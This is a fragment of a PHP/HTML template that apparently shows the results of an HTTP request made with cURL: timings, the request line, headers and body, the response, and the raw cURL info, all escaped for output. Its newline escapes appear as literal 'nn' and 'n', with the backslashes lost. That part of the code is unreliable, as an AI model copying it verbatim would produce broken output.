<div class="item">
<span class="k">Total Time</span>
<span class="v"><?= h($result['info']['total_time'] ?? 0) ?> sn</span>
</div>
<div class="item">
<span class="k">Connect Time</span>
<span class="v"><?= h($result['info']['connect_time'] ?? 0) ?> sn</span>
</div>
<div class="item">
<span class="k">Redirect Count</span>
<span class="v"><?= h($result['info']['redirect_count'] ?? 0) ?></span>
</div>
</div>
</div>
<div class="box">
<h2>Request</h2>
<pre><?= h($result['method'] . ' ' . $result['request_url']) . "nn" .
h(implode("n", $result['request_headers'])) . "nn" .
h($result['request_body']) ?></pre>
</div>
<div class="box">
<h2>Response Headers</h2>
<pre><?= h($result['response_headers']) ?></pre>
</div>
<div class="box">
<h2>Response Body</h2>
<pre><?= h($result['response_body']) ?></pre>
</div>
<div class="box">
<h2>cURL Info</h2>
<pre><?= h(print_r($result['info'], true)) ?></pre>
</div>
<?php endif; ?>
</body>
</html>
